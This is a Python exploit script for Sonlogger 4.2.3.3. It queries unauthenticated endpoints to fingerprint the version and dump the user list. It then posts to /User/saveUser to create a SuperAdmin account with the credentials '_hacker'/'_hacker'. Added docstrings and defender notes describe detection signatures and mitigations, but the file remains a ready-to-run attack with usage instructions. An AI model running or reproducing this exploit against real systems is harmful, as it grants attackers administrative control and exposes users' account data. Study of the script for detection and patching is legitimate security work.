# Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
|
|
# Date: 04-02-2021
|
|
# Exploit Author: Berkan Er
|
|
# Vendor Homepage: https://www.sonlogger.com/
|
|
# Version: 4.2.3.3
|
|
# Tested on: Windows 10 Enterprise x64 Version 1803
|
|
# A remote attacker can create a user with the SuperAdmin profile
|
|
|
|
#!/usr/bin/python3
|
|
|
|
import argparse
|
|
import string
|
|
import sys
|
|
from random import random
|
|
|
|
import requests
|
|
import json
|
|
|
|
banner = '''
|
|
Sonlogger Log and Report System - v4.2.3.3
|
|
Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
|
|
|
|
Berkan Er <b3rsec@protonmail.com>
|
|
@erberkan
|
|
'''
|
|
|
|
# Headers attached to every POST below. They imitate the product's own
# browser-side XHR calls (JSON body, X-Requested-With marker). None of the
# requests in this file carries a session cookie or credential, so on the
# defender side a POST to these endpoints with this header set but no
# session is a usable detection signature.
commonHeaders = {
    'Content-type': 'application/json',
    'Accept': 'application/json, text/javascript, */*; q=0.01',
    'X-Requested-With': 'XMLHttpRequest'
}
|
|
|
|
|
|
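def get_random_string(length=8):
    """Return a random lowercase ASCII string and echo it to stdout.

    The original body called ``random.choices``, but this module imports
    ``from random import random`` — a *function* — so the attribute lookup
    raised AttributeError. Drawing from ``secrets`` sidesteps that name
    clash. The helper is not referenced anywhere else in this listing.

    Args:
        length: Number of characters to generate (default 8, as before).
            Values <= 0 yield an empty string.

    Returns:
        The generated string (also printed, preserving the old side effect).
    """
    import secrets  # local import: module-level ``random`` is shadowed by the function

    alphabet = string.ascii_lowercase
    res = ''.join(secrets.choice(alphabet) for _ in range(length))
    print(res)
    return res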
|
|
|
|
|
|
def getProductInfo(host, port, flag):
    """Query the two pre-auth info endpoints and report whether the target looks vulnerable.

    Args:
        host: Hostname or IP of the Sonlogger instance (string, concatenated into the URL).
        port: Port as a *string*; it is concatenated with ``+``, so an int raises TypeError.
        flag: When truthy, also dump the full product-info and user-list JSON.

    Returns:
        True when the reported ``Version`` is exactly '4.2.3.3', otherwise False.

    Raises:
        Propagates ``requests`` errors (connection refused, timeout), and
        ValueError / KeyError when a response is not JSON or lacks ``Version``.

    Defender notes: both POSTs are sent with no session cookie or credential,
    so a JSON body coming back means these paths answer before authentication.
    Mitigation is to require an authenticated session on /shared/GetProductInfo
    and /User/getUsers (the latter is the information-disclosure part);
    detection is pre-auth POSTs to those paths carrying X-Requested-With.
    """
    response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
                             data={},
                             headers=commonHeaders)

    print("[*] Status code: ", response.status_code)
    # response.json() re-parses the body on each call; the payload is small, so harmless.
    print("[*] Product Version: ", response.json()['Version'])
    info_json = json.dumps(response.json(), indent=2)

    # Account list; only printed when flag is set, but always fetched.
    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
    user_json = json.dumps(response_1.json(), indent=2)

    if flag:
        print("\n*** Product Infos=\n" + info_json)
        print("\n*** Users=\n" + user_json)

    # Exact match on the single tested build. Any other version string is
    # reported as not vulnerable, which is a fingerprint check, not proof of safety.
    if response.json()['Version'] == '4.2.3.3':
        print("[+] It seems vulnerable !")
        return True
    else:
        print("[!] It doesn't vulnerable !")
        return False
|
|
|
|
|
|
def createSuperAdmin(host, port):
    """POST a fixed user record to /User/saveUser, then print the user list.

    No authentication is attempted; the only gate before this call is the
    version match in getProductInfo(), which is a fingerprint, not an auth probe.

    Args:
        host: Hostname or IP of the Sonlogger instance.
        port: Port as a string (concatenated into the URL).

    Returns:
        None. The outcome is only printed, and the "User has been created"
        line is printed unconditionally — regardless of status_code — so the
        user list that follows is the actual confirmation.

    Defender notes: the record is fully identifiable (profile
    'superadmin_profile', username '_hacker'). Alert on any /User/saveUser
    POST without a session and on new accounts in the SuperAdmin profile;
    on a hit, remove the account and audit what it was used for.
    """
    # NOTE(review): single-quoted keys are not strict JSON, yet this body is sent
    # verbatim under Content-type: application/json; the product's parser
    # evidently tolerated it when tested. Re-encoding with json.dumps would change
    # the bytes on the wire.
    payload = '''{
'_profilename':'superadmin_profile',
'_username':'_hacker',
'_password':'_hacker',
'_fullname':'', '_email':''
}'''

    response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
    # "STAUTS" is a typo inside a runtime string; left untouched here.
    print("[*] STAUTS CODE:", response.status_code)
    # Printed even on a non-2xx response; not a confirmation by itself.
    print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")

    # Re-fetch the account list so the caller can see whether the record landed.
    response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
    json_formatted_str = json.dumps(response_1.json(), indent=2)
    print("\n*** Users=\n" + json_formatted_str)
|
|
|
|
|
|
def main():
    """CLI entry point: ``script HOST PORT {TRUE|FALSE}``.

    ``argparse`` is imported at module level but unused; positional
    ``sys.argv`` is read instead. Only the literal string 'TRUE' leads to
    createSuperAdmin(), and only after getProductInfo() returns True; any
    other third argument just prints product info and the user list.

    The bare ``except:`` catches *everything* — a missing argument, but also
    connection errors, non-JSON responses and even KeyboardInterrupt — and
    reports all of them as a usage error, so a failed request is
    indistinguishable from a typo. Limiting the try block to the three
    ``sys.argv`` reads with ``except IndexError:`` would make network
    failures visible as themselves.
    """
    print(banner)

    try:
        host = sys.argv[1]
        port = sys.argv[2]
        action = sys.argv[3]

        if action == 'TRUE':
            # Creation is attempted only when the version fingerprint matched.
            if getProductInfo(host, port, False):
                createSuperAdmin(host, port)
        else:
            getProductInfo(host, port, True)

        print("KTHNXBYE!")

    except:
        print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
              "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
              "Infos")
        print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")
|
|
|
|
|
|
# Script guard: run main() only when executed directly, not on import.
if __name__ == "__main__":
    main()